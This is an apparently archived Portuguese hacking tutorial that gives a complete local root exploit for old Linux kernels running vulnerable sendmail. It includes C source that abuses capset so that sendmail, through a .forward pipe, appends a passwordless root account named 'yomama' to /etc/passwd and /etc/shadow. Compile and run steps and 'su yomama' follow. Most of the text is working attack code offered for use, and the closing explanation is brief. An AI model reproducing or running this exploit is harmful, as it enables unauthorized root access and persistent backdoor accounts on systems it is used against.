Trojans

Sendmail Bug

A t3kn33k que eu vou explicar aqui pode ser aplicada em qualquer maquina linux
que esteja usando o kernel 2.2.15, OU MAIS ANTIGO e esteja rodando o sendmail,
nas versoes INFERIORES a 8.10.2. Hummm... se voce fizer uma pesquisa, vai
descobrir que mais 90% das maquinas linux, rodando como servidores estao dentro
desse perfil. Nota: o kernel 2.2.16 esta patcheado, porem no 2.4.0 (o mais novo,
ainda instavel) o bug nao foi corrigido.

Bom, para ter sucesso basta ter uma conta no sistema. Portanto nao se pode obter
permissoes de r00t remotamente usando esta tecnica.

Vamos ao que interessa. Envie por ftp os arquivos:

<++> sendmail/ex.c
#include <linux/capability.h>

int main (void) {
cap_user_header_t header;
cap_user_data_t data;

header = malloc(8);
data = malloc(12);

header->pid = 0;
header->version = _LINUX_CAPABILITY_VERSION;

data->inheritable = data->effective = data->permitted = 0;
capset(header, data);

execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}
<-->
<++> sendmail/add.c
#include <fcntl.h>

int main (void) {
int fd;
char string[40];

seteuid(0);
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
strcpy(string, "yomama::11029:0:99999:7:::");
write(fd, string, strlen(string));
close(fd);

}
<-->
<++> sendmail/mail
From: [email protected]
To: [email protected]
Subject: foo
bar
.
<-->
<++> sendmail/.forward
|./add
<-->

Detalhe: esses arquivos devem ficar no diretorio do usuario.
Pronto, depois dos arquivo enviados, logue no sistema e compile o ex.c e o
add.c.

# gcc -o add add.c
# gcc -o ex ex.c

Agora faca o seguinte:

# ./ex < mail
# su yomama

Voce r00teou a maquina!!

Agora vou explicar por alto o q o exploit faz. Ele explora um bug do kernel e
faz com que o daemon sendmail (q eh executado pelo root), atraves de um envio
de e-mail, insira uma linha no /etc/passwd e /etc/shadow da maquina, criando
assim um usuario, q sera chamado no caso de yomama. Basta dar uma lida nos
fontes dos explois que vc vera rapidinho como ele funciona.

Hosted by www.Geocities.ws